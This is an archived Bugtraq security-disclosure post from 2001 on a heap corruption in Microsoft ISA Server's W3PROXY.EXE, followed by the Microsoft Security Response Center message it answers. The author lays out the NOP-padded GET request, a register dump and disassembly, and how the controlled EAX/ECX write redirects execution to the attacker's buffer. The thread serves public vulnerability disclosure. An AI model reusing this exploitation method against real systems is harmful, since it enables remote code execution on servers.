This was tested with the standard edition available on the Microsoft site.. Details - 04/27/2001 01:56a 369,936 W3PROXY.EXE Request - GET http://host/<2338 x nop><offset to user buffer><stored ret address> We found we needed to send this request twice to reach the code location where we are able to execute our buffer.. the heap corruption can lead to random crash locations - but we hit this point more often than not - the fact is, it is possible. EAX=41414141 EBX=02492394 ECX=78787878 EDX=0105B9F8 ESI=0105B9F8 EDI=024A25F0 EBP=0621FE1C ESP=0621FDF8 EIP=0101D72F o d I s z A p c CS=001B DS=0023 SS=0023 ES=0023 FS=0038 GS=0000 ds:41414141=FFFFFFFF 001b:0101d72f mov [eax], ecx 001b:0101d731 mov [ecx+04], eax 001b:0101d734 call [ntdll!RtlLeaveCriticalSection] 001b:0101d73a mov eax, edi 001b:0101d73c pop edi 001b:0101d73d pop esi 001b:0101d73e ret (PASSIVE)-KTEB(854083E0)-TID(05C4)--W3PROXY!.text+0001C741---------- As you can see we are able to define the values of ecx and eax... we can write whatever data we want to a location of our choosing. By overwriting eax with a saved return address and ecx with the address of our buffer we can execute our code. We had a couple of inventive ways of getting the needed stack values.. overwriting string locations with the data and having the product output the values was one. A few possibilities. Am I done? dark spyrit. ----- Original Message ----- From: "Microsoft Security Response Center" <secureat_private> To: <BUGTRAQat_private> Sent: Saturday, April 28, 2001 2:54 AM Subject: Re: Microsoft ISA Server Vulnerability Hi - You're right that the root problem here is a heap corruption. The Knowledge Base article we published on the subject (http://support.microsoft.com/support/kb/articles/q295/2/79.asp, "Cause") notes that this is the case. As part of our investigation, we examined whether the heap corruption could, in this case, be exploited to run code, but we were unable to find any way to do so. If you can demonstrate an ability to run code via the exploit, please contact us immediately as we'd be most interested in investigating the issue further. Regards, Scott Culp Security Program Manager Microsoft Corporation
This archive was generated by hypermail 2b30 : Sat Apr 28 2001 - 10:13:15 PDT